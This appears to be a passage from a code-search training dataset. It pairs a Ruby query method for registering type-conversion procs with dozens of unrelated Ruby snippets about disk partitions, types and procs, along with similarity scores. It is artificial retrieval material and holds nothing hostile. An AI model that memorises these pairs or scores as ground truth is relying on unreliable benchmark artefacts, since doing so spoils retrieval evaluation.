end\n\n Builtins.y2milestone(\"%1 %2\", partition, freshman)\n\n deep_copy(freshman)\n end",
"def partition(predicate)\n each_operand(predicate) do |operand|\n case operand\n when Axiom::Function::Binary then partition_binary(operand)\n when Axiom::Function::Unary then partition_unary(operand)\n when Axiom::Attribute::Boolean then partition_attribute(operand)\n else\n partition_proposition(operand)\n end\n end\n end",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def closud_type(part)\n if part.flex?\n :flexibles\n elsif part.user?\n :consumers\n else\n :producers\n end\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end",
"def CreatePartition(disk, device, ptype, id, start, len, mby)\n Builtins.y2milestone(\n \"CreatePartition disk:%1 device:%2 ptype:%3 id:%4 start:%5 len:%6 mby:%7\",\n disk,\n device,\n ptype,\n id,\n start,\n len,\n mby\n )\n pt = fromSymbol(@conv_ptype, ptype)\n Builtins.y2milestone(\"CreatePartition type:%1 pt:%2\", ptype, pt)\n ret, cdev = @sint.createPartition(disk, pt, start, len)\n cdev = \"\" if ret<0\n if device != cdev\n Builtins.y2error(\"CreatePartition device:%1 cdev:%2\", device, cdev)\n end\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n ret = @sint.changePartitionId(device, id)\n Builtins.y2error(\"CreatePartition ret %1\", ret) if ret<0\n tmp = fromSymbol(@conv_mountby, mby)\n @sint.changeMountBy(device, tmp)\n Builtins.y2milestone(\"CreatePartition sint ret:%1\", ret)\n UpdateTargetMap()\n ret == 0\n end",
"def partition_device\n Souffle::Log.info \"#{@node.log_prefix} Partitioning the device...\"\n provider.partition(@node)\n end",
"def MountPartition(mount_point, device, mount_type)\n if mount_type == \"\"\n # e.g. -> \"reiserfs\"\n mount_type = FileSystems.GetMountString(Storage.DetectFs(device), \"\")\n end\n\n # #223878, do not call modprobe with empty mount_type\n if mount_type == \"\"\n Builtins.y2warning(\"Unknown filesystem, skipping modprobe...\") \n # #211916, sysfs, proc are not modular\n elsif !Builtins.contains(@non_modular_fs, mount_type)\n # #167976, was broken with \"-t \", modprobe before adding it\n Builtins.y2milestone(\"Calling 'modprobe %1'\", mount_type)\n SCR.Execute(path(\".target.modprobe\"), mount_type, \"\")\n else\n Builtins.y2milestone(\n \"FS type %1 is not modular, skipping modprobe...\",\n mount_type\n )\n end\n\n error_message = nil\n if !(\n error_message_ref = arg_ref(error_message);\n _RunFSCKonJFS_result = RunFSCKonJFS(\n mount_type,\n device,\n error_message_ref\n );\n error_message = error_message_ref.value;\n _RunFSCKonJFS_result\n )\n return error_message\n end\n\n mount_type = Ops.add(\"-t \", mount_type) if mount_type != \"\"\n\n ret = Convert.to_boolean(\n SCR.Execute(\n path(\".target.mount\"),\n [\n device,\n Ops.add(Installation.destdir, mount_point),\n Installation.mountlog\n ],\n mount_type\n )\n )\n if ret\n return nil\n else\n return Convert.to_string(\n SCR.Read(path(\".target.string\"), Installation.mountlog)\n )\n end\n end",
"def type\n # If we know for sure its a backup\n if self.p_s_b == \"B\"\n return \"Backup\"\n else\n pmr = self.pmr\n param = self.to_param\n # Otherwise, try and figure out\n case param\n when pmr.primary_param\n return \"Primary\"\n when pmr.secondary_1_param\n return \"Sec 1\"\n when pmr.secondary_2_param\n return \"Sec 2\"\n when pmr.secondary_3_param\n return \"Sec 3\"\n else\n return \"Backup\"\n end\n end\n end",
"def drive_type; end",
"def drive_type\n return @drive_type\n end",
"def drive_type\n return @drive_type\n end",
"def full_format fstype, label = nil\n DebugLogger.info \"class = #{self.class.name}, method = #{__method__}\"\n delete_all_partitions unless partitions.blank?\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Creating partition #{self.kname}\"\n DiskUtils.create_partition self, 1, -1\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Find partition #{@kname}\"\n self.reload\n new_partition = self.partitions.last # Assuming new partition to be at the last index\n DebugLogger.info \"|#{self.class.name}|>|#{__method__}|:Formating #{@kname} to #{fstype}\"\n new_partition.format fstype and reload\n end",
"def create_partition(size = nil, type = Partition.PartitionType[:TYPE_PRIMARY])\n DiskUtils.create_partition self, size[:start_block], size[:end_block]\n partitions = Device.find(self).partitions\n return partitions.last\n end",
"def list_partitions_with_size_and_type # by nelsongs. => list: partition size type\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\") print $1\":\"$5\":\"$6;else print $1\":\"$4\":\"$5}' | sed s/+//g`.split\nend",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition_lookup\n return @partition_lookup unless @partition_lookup.nil?\n io = _root._io\n _pos = io.pos\n io.seek(_root.sector_size)\n @_raw_partition_lookup = io.read_bytes(sector_size)\n _io__raw_partition_lookup = Kaitai::Struct::Stream.new(@_raw_partition_lookup)\n @partition_lookup = PartitionEntry.new(_io__raw_partition_lookup, self, @_root)\n io.seek(_pos)\n @partition_lookup\n end",
"def get_type; raise NotImplementedError end",
"def type\n (@type || :invoke).to_sym\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def method_for_kind!(kind)\n method = nil\n if !@method_override.nil?\n method = @method_override\n elsif kind == Springcm::Folder\n method = :folders\n elsif kind == Springcm::Document\n method = :documents\n elsif kind == Springcm::AttributeGroup\n method = :attribute_groups\n elsif kind == Springcm::HistoryItem\n method = :history\n elsif kind == Springcm::Group\n method = :groups\n elsif kind == Springcm::User\n method = :users\n else\n raise ArgumentError.new(\"Resource kind must be one of: Springcm::Document, Springcm::Folder, Springcm::AttributeGroup, Springcm::HistoryItem, Springcm::User, Springcm::Group.\")\n end\n return method\n end",
"def first_os_partition\n os_part = @partition_layout.detect { |p| p.os == true }\n return os_part if os_part\n\n # Next look for an OS in a LVM partition\n lvm_part = @partition_layout.detect { |p| p.lvm != nil }\n raise RuntimeError, 'OS and LVM partitions missing' unless lvm_part\n\n os_part = lvm_part.lvm.volumes.detect { |p| p.os == true }\n raise RuntimeError, 'No partitions marked as OS' unless os_part\n\n return os_part\n end",
"def partition_type_hex kname\n # Return Hex value of the partition type.Reliable compared to pure tex comparison.\n # Reference: https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Installation_Guide/ch-partitions-x86.html#tb-partitions-types-x86\n if DEBUG_MODE or Platform.ubuntu? or Platform.fedora?\n command = \"udevadm\"\n params = \" info --query=property --name=#{kname}\"\n end\n udevadm = CommandsExecutor.new command, params\n udevadm.execute false, false # None blocking and not debug mode\n raise \"Command execution error: #{udevadm.stderr.read}\" if not udevadm.success?\n udevadm.result.each_line do |line|\n line.squish!\n key = 'ID_PART_ENTRY_TYPE'\n _key, value = line.split '='\n return value.hex if _key.eql? key\n end\n end",
"def part_title_by_type(resource_type)\n if self.type == resource_type\n self.title\n elsif self.has_part && self.has_part.type == resource_type\n self.has_part.title\n else\n nil\n end\n end",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def IsResizable(part)\n part = deep_copy(part)\n ret = FileSystems.IsResizable(:unknown)\n if !Arch.s390 && Partitions.IsResizable(Ops.get_integer(part, \"fsid\", 0)) ||\n Ops.get_symbol(part, \"type\", :none) == :lvm\n if Ops.get_integer(part, \"fsid\", 0) == Partitions.fsid_swap\n ret = FileSystems.IsResizable(:swap)\n else\n if !(Ops.get_symbol(part, \"type\", :none) == :lvm &&\n Ops.get_symbol(part, \"used_fs\", :unknown) == :vfat)\n ret = FileSystems.IsResizable(\n Ops.get_symbol(part, \"used_fs\", :unknown)\n )\n end\n end\n end\n ret[\"device\"] = (Partitions.IsResizable(part.fetch(\"fsid\",0)) &&\n !part.fetch(\"device\",\"\").start_with?(\"/dev/dasd\")) ||\n\t\t part.fetch(\"type\",:none)==:lvm\n Builtins.y2milestone(\"IsResizable part:%1 ret:%2\", part, ret)\n deep_copy(ret)\n end",
"def part_of_title_by_type(resource_type)\n if self.type == resource_type\n self.title\n elsif self.is_part_of && self.is_part_of.type == resource_type\n self.is_part_of.title\n else\n nil\n end\n end",
"def filesystem_type(host)\n case host['platform']\n when %r{aix}\n 'jfs2'\n when %r{el-|centos|fedora|sles|debian|ubuntu}\n 'ext3'\n else\n # TODO: Add Solaris and OSX support, as per PUP-5201 and PUP-4823\n fail_test(\"Unable to determine a standard filesystem table type for #{host['platform']}\")\n end\n end",
"def df_type\n raise NoMethodError, \"#{__method__} not defined for #{self.class.name}\"\n end",
"def kind\n raise NotImplementedError\n end",
"def default_synced_folder_type(machine, plugins)\n ordered = []\n\n # First turn the plugins into an array\n plugins.each do |key, data|\n impl = data[0]\n priority = data[1]\n\n ordered << [priority, key, impl]\n end\n\n # Order the plugins by priority\n ordered = ordered.sort { |a, b| b[0] <=> a[0] }\n\n # Find the proper implementation\n ordered.each do |_, key, impl|\n return key if impl.new.usable?(machine)\n end\n\n return nil\n end",
"def partition_left_tautology?\n partition.left.equal?(Axiom::Function::Proposition::Tautology.instance)\n end",
"def journal_task_type\n journal.journal_task_types.find_by(kind: self.class.name)\n end",
"def type\n rank.first\n end",
"def os_type\n vm.storage_profile.os_disk.os_type\n end",
"def partition_used(partition)\n # Return magic number if in test_mode to prevent syscall\n return '128' if @test_mode\n b = ' ' * 128\n syscall(137, partition, b)\n a = b.unpack('QQQQQ')\n [a[2] * blocks_per_kilobyte, a[4] * blocks_per_kilobyte]\n end",
"def type_specific_part\n return @type_specific_part unless @type_specific_part.nil?\n io = type_specific_part_raw_with_io._io\n _pos = io.pos\n io.seek(0)\n case common_part.header_type\n when 8\n @type_specific_part = TypeSpecificPartType8.new(io, self, @_root)\n when 9\n @type_specific_part = TypeSpecificPartType9.new(io, self, @_root)\n end\n io.seek(_pos)\n @type_specific_part\n end",
"def get_1st_partition(device)\n # Resolves the real device name (ex. /dev/sdg)\n Chef::Log.info(\"Getting 1st partition for device: #{device}\")\n fs_check = Mixlib::ShellOut.new(\"lsblk -ln -o Name #{device}|awk 'NR==2'\")\n fs_check.run_command\n partition = \"/dev/\" + fs_check.stdout.strip\n Chef::Log.info(\"1st partition for device: #{device} is: #{partition}\")\n partition\nend",
"def to_detect_type_by(name, &block)\n Reflection.to_detect_type_by(name, &block)\n end",
"def kind\n # returns nil, overridden and returning :question, :problem, etc. in sublcass\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def column_type\n object.class.scaffold_column_type(@method_name)\n end",
"def type\n @type ||= calculate_type\n end",
"def GetPartitionInfo\n partition = []\n\n if Stage.cont\n partition = EvaluateFreeSpace(0) # free spare already checked during first part of installation\n elsif Mode.update\n partition = EvaluateFreeSpace(15) # 15% free spare for update/upgrade\n elsif Mode.normal\n partition = EvaluateFreeSpace(5) # 5% free spare for post installation # Stage::initial ()\n else\n partition = get_partition_info\n end\n Builtins.y2milestone(\n \"INIT done, SpaceCalculation - partitions: %1\",\n partition\n )\n\n @info_called = true\n @partition_info = deep_copy(partition) # store partition_info\n\n deep_copy(partition)\n end",
"def type\n raise NotImplementedError\n end",
"def part_type=(value)\n\n end",
"def type\n\t\traise NotImplementedError\n\tend",
"def dir_for(type) self.slice_paths[type].first end",
"def get_type\n\n end",
"def partition(filters={})\n input, output = self.input, self.output\n filters.each_pair do |filter_key, f|\n if f.call(input, output)\n return filter_key\n end\n end\n nil\n end",
"def type\n self.class.to_s.split('::').last.downcase.to_sym\n end",
"def shuffle_type_is_appropriate(params)\n @shuffle_type = :shuffle\n @shuffle_type = slug_to_snakecase_symbol(params[:type]) if params.has_key?(:type)\n\n shuffle_type_defined = Shuffler.methods(false).include? @shuffle_type\n\n # Revert to the default if necessary.\n @shuffle_type = :shuffle unless shuffle_type_defined\n\n shuffle_type_defined\n end",
"def rectype\n part.rectype if part\n end",
"def definition; Mrowka::Tasks[self.type.to_sym]; end",
"def partition_selector\n @subhash = {}\n @filters = {}\n\n partition_selector_hash @selector, []\n end",
"def type\n\t\t\traise NotImplementedError\n\t\tend",
"def bootloader_partitions\n raise RuntimeError, \"Not implemented in base class\"\n end",
"def type\n if is_name_new?; :name_new\n elsif is_name_firstupdate?; :name_firstupdate\n elsif is_name_update?; :name_update\n elsif is_pubkey_hash?; :pubkey_hash\n elsif is_pubkey?; :pubkey\n elsif is_multisig?; :multisig\n elsif is_script_hash?; :script_hash\n elsif is_op_return?; :op_return\n else; :unknown\n end\n end",
"def type\n self.class.name.split(':').last.downcase\n end",
"def list_swap_partitions_with_type_and_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5\":\"$6;else {if ($5==\"82\") print $1\":\"$4\":\"$5}}' | sed s/+//g`.chomp.split\nend",
"def determine_resource_type( rt_overrides, solr_doc )\n\n # extract the resource type from the SOLR document\n resource_type = solr_doc.at_path( 'object_type_facet[0]' )\n # check to see if we have an override specified\n resource_type = check_for_resource_type_override( rt_overrides,resource_type, solr_doc )\n # ensure we have identified one\n if resource_type.nil?\n puts \"ERROR: unable to determine resource type\"\n return nil\n end\n\n # check it is valid\n\n # initialize the resource types list if it is empty\n @valid_resource_types = ResourceTypesService.authority.all.map { |e| e[:label] } if @valid_resource_types.empty?\n\n if @valid_resource_types.include?( resource_type )\n return resource_type\n else\n case resource_type\n when 'Conference Paper'\n return 'Conference Proceeding'\n when 'Article Preprint'\n return 'Article'\n when 'Chapter in an Edited Collection'\n return 'Part of Book'\n else\n puts \"ERROR: unsupported resource type: #{resource_type}\"\n return nil\n end\n end\n end",
"def type_klass; end",
"def disk_type=(value)\n @disk_type = value\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def default_synced_folder_type(machine, plugins)\n ordered = []\n\n # First turn the plugins into an array\n plugins.each do |key, data|\n impl = data[0]\n priority = data[1]\n\n ordered << [priority, key, impl]\n end\n\n # Order the plugins by priority. Higher is tried before lower.\n ordered = ordered.sort { |a, b| b[0] <=> a[0] }\n\n allowed_types = machine.config.vm.allowed_synced_folder_types\n if allowed_types\n ordered = allowed_types.map do |type|\n ordered.find do |_, key, impl|\n key == type\n end\n end.compact\n end\n\n # Find the proper implementation\n ordered.each do |_, key, impl|\n return key if impl.new.usable?(machine)\n end\n\n return nil\n end",
"def add_partition_key(name, type)\n PartitionKey.new(name, type(type)).tap do |column|\n @partition_key_columns << add_column(column)\n end\n end",
"def primary_model\n case params[:retrieval_type]\n when 'stored_file'\n NfsStore::Manage::StoredFile\n when 'archived_file'\n NfsStore::Manage::ArchivedFile\n else\n raise FphsException, 'No retrieval_type set'\n end\n end",
"def method_type selector\n case selector\n when '.', nil then :both\n when '#' then :instance\n else :class\n end\n end",
"def method_type selector\n case selector\n when '.', nil then :both\n when '#' then :instance\n else :class\n end\n end",
"def get_key_type()\n if @metadata[:key_type] == nil\n # Choose a compatible type for the note already chosen (if there is one).\n if @metadata[:key_note] == :cb || @metadata[:key_note] == :gb || @metadata[:key_note] == :db\n self.key_type(:major)\n elsif @metadata[:key_note] == :gs || @metadata[:key_note] == :ds || @metadata[:key_note] == :as\n self.key_type(:minor)\n else\n # No constraint- choose any. (Both are valid for this key note).\n self.key_type([:major, :minor].choose)\n end\n end\n return @metadata[:key_type]\n end",
"def type\n self_class.to_s.to_sym\n end",
"def physical_type\n provider.physical_type\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def type\n klass = self.class.name\n if sep = klass.rindex('::')\n klass[(sep+2)..-1]\n else\n klass\n end.underscore.to_sym\n end",
"def provisioning_step_type\n return @provisioning_step_type\n end",
"def determine_method_class(method)\n method = method.to_s\n \"Highcharts::#{base_options.include?(method) ? 'Base' : default_options.include?(method) ? method.capitalize : custom_options[method]}\"\n end",
"def drive_type\n fetch('vehicle.drive_types')\n end",
"def partitioned_state\n super\n end",
"def create_partitions\n info(\"Creating disk with #{PARTITION_TABLE_TYPE} parition table\")\n execute!(\"parted -s #{@dev} mklabel #{PARTITION_TABLE_TYPE}\")\n\n start_size = FIRST_PARTITION_OFFSET\n end_size = FIRST_PARTITION_OFFSET\n\n unspec_part = nil\n\n # Create the partitions\n @partition_layout.each_with_index do |part, index|\n # Deal with any \"open ended\" partitions last\n if not part.size_mb.is_a?(Integer)\n unspec_part = part\n next\n end\n\n start_size = end_size\n end_size += part.size_mb\n\n info(\"Creating partition #{part.label} (#{part.fs}, #{part.size_mb}MiB)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{start_size}MiB #{end_size}MiB\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{index + 1} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n\n if not part.fs\n warn(\"No filesystem specified for #{part.label}. Skipping FS\")\n else\n create_filesystem(part.fs, label_path, part.label)\n end\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n # Deal with any \"open ended\" partitions (that have an unspecified size_mb)\n if unspec_part\n part = unspec_part\n info(\"Creating partition #{part.label} (#{part.fs}, 100% remaining)\")\n execute!(\"parted #{@dev} mkpart #{part.label} #{part.fs} #{end_size}MiB 100%\")\n\n (part.flags || {}).each_pair { |k, v|\n info(\"Setting partition flag #{k} to #{v}\")\n execute!(\"parted #{@dev} set #{@partition_layout.length} #{k} #{v}\")\n }\n\n label_path = \"/dev/disk/by-partlabel/#{part.label}\"\n self.wait_for_device(label_path)\n create_filesystem(part.fs, label_path, part.label) if part.fs\n\n if part.lvm\n notice(\"Setting up LVM on #{part.label}\")\n setup_lvm_on_partition(part)\n end\n end\n\n nil\n end",
"def request_class(endpoint)\n subject_service.rpcs[endpoint].request_type\n end",
"def onepartition2fstab(part, other_nr)\n part = deep_copy(part)\n Builtins.y2milestone(\"onepartition2fstab part=%1\", part)\n if Ops.get_boolean(part, \"delete\", false) ||\n Ops.get_symbol(part, \"type\", :unknown) == :extended ||\n Builtins.contains(\n [:lvm, :sw_raid, :evms],\n Ops.get_symbol(part, \"type\", :unknown)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0 ||\n Ops.get_symbol(part, \"enc_type\", :none) != :none &&\n !Ops.get_boolean(part, \"noauto\", false) ||\n !IsUsedBy(part) ||\n Builtins.contains(\n [\n Partitions.fsid_prep_chrp_boot,\n Partitions.fsid_lvm,\n Partitions.fsid_raid\n ],\n Ops.get_integer(part, \"fsid\", 0)\n ) &&\n Builtins.size(Ops.get_string(part, \"mount\", \"\")) == 0\n return {}\n end\n\n spec = Ops.get_string(part, \"device\", \"\")\n if Ops.get_symbol(part, \"mountby\", :device) == :label &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"label\", \"\")), 0)\n spec = Builtins.sformat(\"LABEL=%1\", Ops.get_string(part, \"label\", \"\"))\n elsif Ops.get_symbol(part, \"mountby\", :device) == :uuid &&\n Ops.greater_than(Builtins.size(Ops.get_string(part, \"uuid\", \"\")), 0)\n spec = Builtins.sformat(\"UUID=%1\", Ops.get_string(part, \"uuid\", \"\"))\n end\n Builtins.y2debug(\"onepartition2fstab spec=%1\", spec)\n mount_point = Ops.get_string(part, \"mount\", \"\")\n fsid = Ops.get_integer(part, \"fsid\", 0)\n\n used_fs = Ops.get_symbol(part, \"used_fs\", :ext2)\n format = Ops.get_boolean(part, \"format\", false)\n\n vfstype = \"unknown\" # keep \"unknown\", used again below\n freq = 0\n passno = 0\n mntops = Ops.get_string(part, \"fstopt\", \"\")\n\n if mount_point == \"swap\"\n vfstype = \"swap\"\n if Builtins.isempty(mntops)\n mntops = Ops.get_string(\n FileSystems.GetFstabDefaultMap(\"swap\"),\n \"mntops\",\n \"\"\n )\n end\n passno = 0\n elsif fsid == Partitions.fsid_native || fsid == Partitions.fsid_lvm ||\n Ops.get_symbol(part, \"type\", :unknown) == :evms &&\n Ops.get_symbol(part, \"detected_fs\", :none) != :unknown\n vfstype = FileSystems.GetMountString(used_fs, format ? \"ext2\" : \"auto\")\n\n freq = 1\n if mount_point == \"/\"\n passno = 1\n elsif mount_point != \"\"\n passno = 2\n elsif Stage.initial && !Arch.s390\n mount_point = Ops.add(\"/data\", other_nr.value)\n # Don't mount and fsck this filesystem during boot, its\n # state is unknown.\n mntops = \"noauto,user\"\n vfstype = \"auto\"\n freq = 0\n passno = 0\n other_nr.value = Ops.add(other_nr.value, 1)\n Builtins.y2milestone(\"TT add MountPoint %1\", mount_point)\n end\n elsif (Arch.i386 || Arch.ia64 || Arch.x86_64) &&\n Ops.greater_than(Builtins.size(mount_point), 0) &&\n (used_fs == :vfat || used_fs == :ntfs) &&\n (Builtins.contains(\n Builtins.union(\n Builtins.union(\n Partitions.fsid_dostypes,\n Partitions.fsid_ntfstypes\n ),\n Partitions.fsid_wintypes\n ),\n fsid\n ) ||\n fsid == Partitions.fsid_gpt_boot)\n freq = 0\n passno = 0\n lower_point = Builtins.tolower(mount_point)\n if lower_point != \"\" && mount_point != lower_point\n lower_point = PathToDestdir(lower_point)\n Builtins.y2milestone(\n \"symlink %1 -> %2\",\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n SCR.Execute(\n path(\".target.symlink\"),\n Builtins.substring(\n mount_point,\n Ops.add(Builtins.findlastof(mount_point, \"/\"), 1)\n ),\n lower_point\n )\n end\n vfstype = FileSystems.GetMountString(used_fs, \"auto\")\n elsif (Arch.sparc || Arch.alpha) &&\n Builtins.contains(Partitions.fsid_skipped, fsid)\n return {} # skip \"whole disk\" partition\n else\n return {} # unknown type\n end\n if Ops.get_symbol(part, \"detected_fs\", :unknown) == :unknown ||\n Ops.get_boolean(part, \"noauto\", false)\n passno = 0\n end\n\n ret = {\n \"spec\" => spec,\n \"mount\" => mount_point,\n \"vfstype\" => vfstype,\n \"mntops\" => mntops,\n \"freq\" => freq,\n \"device\" => Ops.get_string(part, \"device\", \"\"),\n \"passno\" => passno\n }\n\n if Builtins.size(Ops.get_string(ret, \"mntops\", \"\")) == 0\n Ops.set(ret, \"mntops\", \"defaults\")\n end\n\n Builtins.y2milestone(\"onepartition2fstab ret=%1\", ret)\n deep_copy(ret)\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def kind\n type.to_s.underscore[5..-1]\n end",
"def type; self.class.name.split('::').last.to_sym; end",
"def batch_find(type:, query: {}, config: {}, &blk)\n return to_enum(__callee__, type: type, query: query, config: config) unless block_given?\n pm_class = \"PM::#{type.to_s.camelize}\".constantize\n if policy_machine_storage_adapter.respond_to?(:batch_find)\n policy_machine_storage_adapter.batch_find(type, query, config) do |batch|\n yield(batch.map { |elt| pm_class.convert_stored_pe_to_pe(elt, policy_machine_storage_adapter) })\n end\n else\n batch_size = config.fetch(:batch_size, 1)\n method(type.to_s.pluralize).call(query).each_slice(batch_size, &blk)\n end\n end",
"def determine_paragraph_type\n @paragraph_type = \\\n case\n when blank?\n :blank\n when definition_list? # order is important! A definition_list is also an unordered_list!\n :definition_term\n when (ordered_list? or unordered_list?)\n :list_item\n when property_drawer_begin_block?\n :property_drawer_begin_block\n when property_drawer_end_block?\n :property_drawer_end_block\n when property_drawer_item?\n :property_drawer_item\n when metadata?\n :metadata\n when block_type\n if block_should_be_exported?\n case block_type.downcase.to_sym\n when :center, :comment, :example, :html, :quote, :src\n block_type.downcase.to_sym\n else\n :comment\n end\n else\n :comment\n end\n when title?\n :title\n when raw_text? # order is important! Raw text can be also a comment\n :raw_text\n when comment?\n :comment\n when table_separator?\n :table_separator\n when table_row?\n :table_row\n when table_header?\n :table_header\n when inline_example?\n :inline_example\n when horizontal_rule?\n :horizontal_rule\n else :paragraph\n end\n end",
"def fstype\n return self['fstype'] if has_key?('fstype')\n Chef::Log.info([\n self['fstype'], current[:fstype],\n File.exists?(device) && `file -s '#{device}'`.chomp,\n self,\n ].inspect)\n return current[:fstype] if current[:fstype]\n return unless File.exists?(device)\n dev_type_str = `file -s '#{device}'`.chomp\n case\n when dev_type_str =~ /SGI XFS/ then self['fstype'] = 'xfs'\n when dev_type_str =~ /Linux.*(ext[2-4])/ then self['fstype'] = $1\n else\n raise \"Can't determine filesystem type of #{device} -- set it explicitly in node[:volumes]\"\n end\n self['fstype']\n end",
"def identifying_supertype\n ti = identifying_type_inheritance and ti.supertype\n end"
] |
[
"0.554963",
"0.54393864",
"0.54320496",
"0.53941506",
"0.5306165",
"0.5259705",
"0.52464676",
"0.52419007",
"0.52418816",
"0.5201963",
"0.51878047",
"0.5146065",
"0.51062053",
"0.51016784",
"0.507593",
"0.5063504",
"0.5013748",
"0.50104105",
"0.4990257",
"0.49901363",
"0.49874842",
"0.49697834",
"0.49420843",
"0.49420843",
"0.49350438",
"0.48975468",
"0.48703656",
"0.48538652",
"0.48409387",
"0.48391086",
"0.48229352",
"0.48059613",
"0.4802549",
"0.47856337",
"0.47691125",
"0.4739655",
"0.47109902",
"0.47050062",
"0.47037497",
"0.4703164",
"0.469689",
"0.4683273",
"0.46618167",
"0.46565422",
"0.46557954",
"0.46542984",
"0.46487075",
"0.4648528",
"0.46255016",
"0.4622579",
"0.46179193",
"0.46170592",
"0.4611454",
"0.4602863",
"0.4599416",
"0.45906445",
"0.45770147",
"0.45666623",
"0.4558665",
"0.45577234",
"0.4553181",
"0.45526683",
"0.4547399",
"0.45422336",
"0.45411217",
"0.45384917",
"0.45373642",
"0.45341033",
"0.45253098",
"0.45232815",
"0.45232034",
"0.45179418",
"0.45171207",
"0.45131302",
"0.45091796",
"0.45037058",
"0.45034146",
"0.45034066",
"0.4503071",
"0.44858095",
"0.44858095",
"0.4479059",
"0.4476381",
"0.44748962",
"0.44695348",
"0.44690913",
"0.4468618",
"0.44511503",
"0.44446555",
"0.44427958",
"0.4437",
"0.4436314",
"0.44359285",
"0.44319358",
"0.4428153",
"0.4426437",
"0.44209278",
"0.44204706",
"0.44174325",
"0.44153696"
] |
0.74603456
|
0
|
Set a conversion proc for the given oid. The callable can be passed either as a argument or a block.
|
def add_conversion_proc(oid, callable=nil, &block)
conversion_procs[oid] = callable || block
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_object_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@object_conversions[ oid ] = conversion\n\tend",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def to_proc\n lambda{ call }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n proc { |value| self.(value) }\n end",
"def to_proc\n ->(input) { call(input) }\n end",
"def to_proc\n ->(*args) {call(*args)}\n end",
"def to_proc() end",
"def to_proc() end",
"def cast_with_proc(obj, type)\n if (type == :proc || obj.is_a?(::Proc)) && obj.respond_to?(:to_source)\n :proc\n else\n cast_without_proc(obj, type)\n end\n end",
"def to_proc\n @to_proc ||= method(:coerce).to_proc\n end",
"def to_proc\n if value = @value\n lambda{ value }\n else\n block = @block\n lambda do |*args|\n instance_exec(*args, &block)\n end\n end\n end",
"def to_proc\n ->(*args, &blk) do\n receiver = args.first\n if (blk)\n receiver.send(self, &blk)\n else\n args[0] = self\n receiver.send(*args)\n end\n end\n end",
"def to_proc\n lambda { |x| }\n end",
"def conversion(&block)\n self.converter = block\n end",
"def converter(a_lamda=nil, &block)\n if a_lamda.nil?\n if block_given?\n # TODO: same the block in such a way that it can be called\n @params[:converter] = block\n else\n error \"converter statement without a procedure #{location}\"\n end\n else\n unless Proc == a_lamda.class\n error \"converter expects a proc/lamda but got a #{a_lamda.class} #{location}\"\n else\n @params[:converter] = a_lamda\n end\n end\n end",
"def to_proc\n to_sym.to_proc\n end",
"def eval_as_proc(obj)\n obj.respond_to?(:call) ? obj.call : obj\n end",
"def to_proc() self ; end",
"def to_proc\n Proc.new {|*args| self.invoke(*args) }\n end",
